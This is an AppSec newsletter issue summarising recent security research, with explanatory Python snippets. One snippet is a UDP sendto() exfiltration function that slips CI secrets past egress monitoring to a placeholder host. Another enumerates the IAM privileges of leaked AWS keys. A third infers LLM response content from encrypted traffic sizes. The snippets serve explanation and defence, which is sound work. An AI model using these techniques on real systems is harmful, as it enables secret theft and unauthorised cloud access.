AppSec Weekly - Feb 18, 2026

🌶️ 🌶️ This Week in AppSec World 🌶️ 🌶️

Devansh has written a terrific blog post on bypassing outbound connection detection in harden-runner. My first thought was: how did harden-runner miss UDP socket traffic sent via sendto, sendmsg, and sendmmsg? But after reading the post, it turns out these are legitimate kernel interfaces that simply weren't being monitored. The bypass only applies in audit mode, not in block mode, yet it still appears to evade StepSecurity's detection.
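To make the mechanism concrete, here's a tiny sketch of my own (not code from the blog post) showing why connectionless UDP is easy to miss: sendto() on a datagram socket never issues a connect(), so egress monitoring keyed on connect-style calls sees nothing. The destination address below is just a placeholder from the documentation range.

```python
# Toy illustration (not from the blog post): sending data over UDP with
# sendto() never calls connect(), so egress monitoring that only hooks
# TCP connect-style paths can miss it entirely. The destination is a
# placeholder address from the TEST-NET-3 documentation range.
import socket

EXFIL_DST = ("203.0.113.10", 53)  # hypothetical collector, DNS-like port

def udp_exfil(payload: bytes) -> None:
    # SOCK_DGRAM + sendto() maps to the sendto(2) syscall under the hood;
    # no connect(2) is ever issued on this socket.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(payload, EXFIL_DST)

if __name__ == "__main__":
    udp_exfil(b"ci-secrets-go-here")
```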

Google and Intel ran a joint deep-dive security review of Intel TDX 1.5, stressing that the security of confidential computing hinges on rigorous, collaborative scrutiny of the underlying hardware and firmware rather than marketing promises. The program pulled in external researchers through bug bounty-style incentives, encouraging them to break the TDX trust model and validate both the design and its real-world implementation. What stands out is less any single bug and more the process: a structured, vendor–researcher feedback loop that treats vulnerability discovery as an expected and necessary part of hardening the platform, not an embarrassment to be hidden.

🤖 This Week in AI Security 🤖

The Schneier on Security blog features three research papers on side-channel attacks against LLMs: one from Google DeepMind back in 2024 and two published recently. I'm on the skeptical side about watching encrypted network traffic to infer what topic a user is running inference on. I believe Anthropic patched this by adding a random sequence of text to responses to defeat that kind of traffic analysis.
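For anyone who hasn't read the papers, here's a toy sketch of the core signal they exploit, under the made-up assumption that each streamed chunk carries one token plus a roughly constant framing overhead; the real attacks then feed these length sequences into a model to guess the topic, and random padding is the mitigation.

```python
# Toy sketch of the token-length side channel: if each streamed chunk
# carries one token plus a roughly constant framing overhead, an observer
# of ciphertext sizes can recover the sequence of token lengths without
# decrypting anything. The OVERHEAD value is a made-up assumption.
import random

OVERHEAD = 120  # hypothetical fixed bytes of JSON/SSE/TLS framing per chunk

def token_lengths_from_record_sizes(record_sizes: list[int]) -> list[int]:
    # Recover approximate plaintext token lengths from observed sizes.
    return [max(size - OVERHEAD, 0) for size in record_sizes]

def padded_record_size(token_len: int) -> int:
    # Mitigation in the spirit of what vendors shipped: add a random amount
    # of padding so ciphertext size no longer tracks token length.
    return token_len + OVERHEAD + random.randint(0, 64)

if __name__ == "__main__":
    tokens = ["The", " capital", " of", " France", " is", " Paris", "."]
    observed = [len(t) + OVERHEAD for t in tokens]        # unpadded stream
    print(token_lengths_from_record_sizes(observed))      # leaks lengths
    padded = [padded_record_size(len(t)) for t in tokens]
    print(token_lengths_from_record_sizes(padded))        # signal destroyed
```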

Vulnerability Spoiler Alert appears to scan open-source commits in real time and raise alerts for security fixes before the corresponding CVEs are published. While I really appreciate the effort, publicly publishing these reports makes me uneasy, because it gives attackers a chance to get ahead of well-intentioned organizations that are still patching their code. This idea of ‘spoiler alerts’ for vulnerabilities is not new; back in 2024–25 I was working on Sherlock and found that large language models are already very effective at identifying vulnerabilities and generating PoC exploits.
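I don't know how Vulnerability Spoiler Alert is built internally, but a rough sketch of the general idea is easy to put together with the public GitHub commits API and some naive keyword matching; the repo and keyword list below are purely illustrative.

```python
# Rough sketch of the "spoiler alert" idea (not how the actual service works):
# poll recent commits on a repo and flag ones whose messages look like
# undisclosed security fixes, well before any CVE is published.
import re
import requests

SUSPICIOUS = re.compile(
    r"\b(security|CVE-\d{4}-\d+|overflow|use[- ]after[- ]free|injection|sanitize|XSS|RCE)\b",
    re.IGNORECASE,
)

def flag_security_commits(owner: str, repo: str, limit: int = 30) -> list[str]:
    url = f"https://api.github.com/repos/{owner}/{repo}/commits"
    resp = requests.get(url, params={"per_page": limit}, timeout=10)
    resp.raise_for_status()
    hits = []
    for item in resp.json():
        msg = item["commit"]["message"]
        if SUSPICIOUS.search(msg):
            hits.append(f'{item["sha"][:10]} {msg.splitlines()[0]}')
    return hits

if __name__ == "__main__":
    for line in flag_security_commits("curl", "curl"):  # illustrative repo
        print(line)
```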

Sysdig’s writeup shows how an AI-assisted attacker can go from leaked test credentials in a public S3 bucket to full AWS admin in about eight minutes by chaining together very common misconfigurations in Lambda, IAM, and Bedrock usage. What worries me most is not any new “AI superpower” but how trivial this becomes once you have overprivileged roles, public RAG data, weak guardrails around AI services, and no meaningful runtime monitoring in place.
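None of the individual steps need anything exotic. As a rough illustration (my own sketch, not the Sysdig chain itself), the first few minutes with leaked keys usually look like this: establish who you are and how over-privileged the principal already is.

```python
# Minimal triage sketch (not the Sysdig chain): who do these leaked keys
# belong to, and what policies are already attached? Finding something like
# AdministratorAccess here is exactly the over-privilege the write-up warns
# about. Assumes the credentials belong to an IAM user; values are placeholders.
import boto3

def triage(access_key: str, secret_key: str) -> None:
    session = boto3.Session(
        aws_access_key_id=access_key, aws_secret_access_key=secret_key
    )
    identity = session.client("sts").get_caller_identity()
    print("Identity:", identity["Arn"], "in account", identity["Account"])

    # If it's an IAM user, enumerate its attached and inline policies.
    arn = identity["Arn"]
    if ":user/" in arn:
        user = arn.split("/")[-1]
        iam = session.client("iam")
        for p in iam.list_attached_user_policies(UserName=user)["AttachedPolicies"]:
            print("attached policy:", p["PolicyName"])
        for name in iam.list_user_policies(UserName=user)["PolicyNames"]:
            print("inline policy:", name)

if __name__ == "__main__":
    triage("AKIA...", "...")  # placeholders, not real credentials
```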

🏆 AppSec Tools of The Week 🏆

IronClaw feels like the first serious attempt to turn the OpenClaw “AI agent with tools” idea into something you would actually trust to sit next to your SSH keys and prod infra. I really like how aggressively it leans into isolation and least privilege: untrusted tools are pushed into WASM sandboxes with capability-based permissions, HTTP is locked behind endpoint allowlists, and secrets never touch tool code at all but are injected at the host boundary with leak detection on both request and response paths.
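To be clear, the snippet below is my own toy model of that pattern, not IronClaw code: tool code only ever handles a placeholder, while the host checks the endpoint allowlist, injects the real secret, and scrubs it from responses before anything returns to the sandbox.

```python
# Toy model of host-boundary secret injection plus an endpoint allowlist
# (my sketch, not IronClaw's implementation). Hostnames and values are
# illustrative.
from urllib.parse import urlparse
import requests

ALLOWED_HOSTS = {"api.example.com"}          # illustrative allowlist
REAL_SECRET = "sk-live-not-shown-to-tools"   # lives only on the host side
PLACEHOLDER = "{{API_KEY}}"                  # all the sandboxed tool ever sees

def host_fetch(url: str, headers: dict[str, str]) -> str:
    host = urlparse(url).hostname or ""
    if host not in ALLOWED_HOSTS:
        raise PermissionError(f"endpoint {host!r} not in allowlist")

    # Inject the secret at the host boundary, only after the allowlist check.
    sent = {k: v.replace(PLACEHOLDER, REAL_SECRET) for k, v in headers.items()}
    resp = requests.get(url, headers=sent, timeout=10)

    # Leak detection on the response path: never hand the raw secret back
    # to sandboxed tool code.
    body = resp.text
    if REAL_SECRET in body:
        body = body.replace(REAL_SECRET, "[REDACTED]")
    return body

if __name__ == "__main__":
    print(host_fetch("https://api.example.com/v1/me",
                     {"Authorization": f"Bearer {PLACEHOLDER}"}))
```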

And that’s a wrap for this week! If you enjoy this curated issue, feel free to forward or share it with your appsec folks, team, or hacker club. For feedback, hugs, bugs, or chats, drop an email to [email protected]
